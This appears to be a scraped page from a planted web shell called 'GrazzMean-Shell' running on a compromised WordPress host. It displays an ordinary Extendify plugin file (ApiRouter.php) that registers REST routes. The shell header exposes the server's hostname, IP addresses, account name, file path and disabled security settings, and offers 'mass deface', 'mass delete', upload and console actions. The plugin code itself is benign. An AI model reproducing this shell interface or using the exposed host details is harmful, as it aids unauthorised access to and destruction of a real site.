shell bypass 403

GrazzMean-Shell Shell

: /home/allssztx/public_html/jollyprecast/wp-content/plugins/extendify/app/ [ drwxr-xr-x ]
Uname: Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.213.251.212
Your Ip: 18.226.180.147
User: allssztx (535) | Group: allssztx (533)
Safe Mode: OFF
Disable Function:
NONE
upload mass deface mass delete console

name : ApiRouter.php 
<?php
/**
 * API router
 */

namespace Extendify;

defined('ABSPATH') || die('No direct access.');

/**
 * Simple router for the REST Endpoints
 */
class ApiRouter extends \WP_REST_Controller
{

    /**
     * The class instance.
     *
     * @var $instance
     */
    protected static $instance = null;


    /**
     * The constructor
     */
    public function __construct()
    {
        \add_filter(
            'rest_request_before_callbacks',
            // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter
            function ($response, $handler, $request) {
                // Add the request to our helper class.
                if ($request->get_header('x_extendify')) {
                    Http::init($request);
                }

                return $response;
            },
            10,
            3
        );
    }

    /**
     * Check the authorization of the request
     *
     * @return boolean
     */
    public function checkPermission()
    {
        // Check for the nonce on the server (used by WP REST).
        if (isset($_SERVER['HTTP_X_WP_NONCE']) && \wp_verify_nonce(sanitize_text_field(wp_unslash($_SERVER['HTTP_X_WP_NONCE'])), 'wp_rest')) {
            return \current_user_can(Config::$requiredCapability);
        }

        return false;
    }

    /**
     * Register dynamic routes
     *
     * @param string   $namespace - The api name space.
     * @param string   $endpoint  - The endpoint.
     * @param function $callback  - The callback to run.
     *
     * @return void
     */
    public function getHandler($namespace, $endpoint, $callback)
    {
        \register_rest_route($namespace, $endpoint, [
            'methods' => 'GET',
            'callback' => $callback,
            'permission_callback' => [$this, 'checkPermission'],
        ]);
    }

    /**
     * The post handler
     *
     * @param string $namespace - The api name space.
     * @param string $endpoint  - The endpoint.
     * @param string $callback  - The callback to run.
     *
     * @return void
     */
    public function postHandler($namespace, $endpoint, $callback)
    {
        \register_rest_route($namespace, $endpoint, [
            'methods' => 'POST',
            'callback' => $callback,
            'permission_callback' => [$this, 'checkPermission'],
        ]);
    }

    /**
     * The caller
     *
     * @param string $name      - The name of the method to call.
     * @param array  $arguments - The arguments to pass in.
     *
     * @return mixed
     */
    public static function __callStatic($name, array $arguments)
    {
        $name = "{$name}Handler";
        if (is_null(self::$instance)) {
            self::$instance = new static();
        }

        $r = self::$instance;
        return $r->$name(Config::$slug . '/' . Config::$apiVersion, ...$arguments);
    }
}
© 2025 GrazzMean-Shell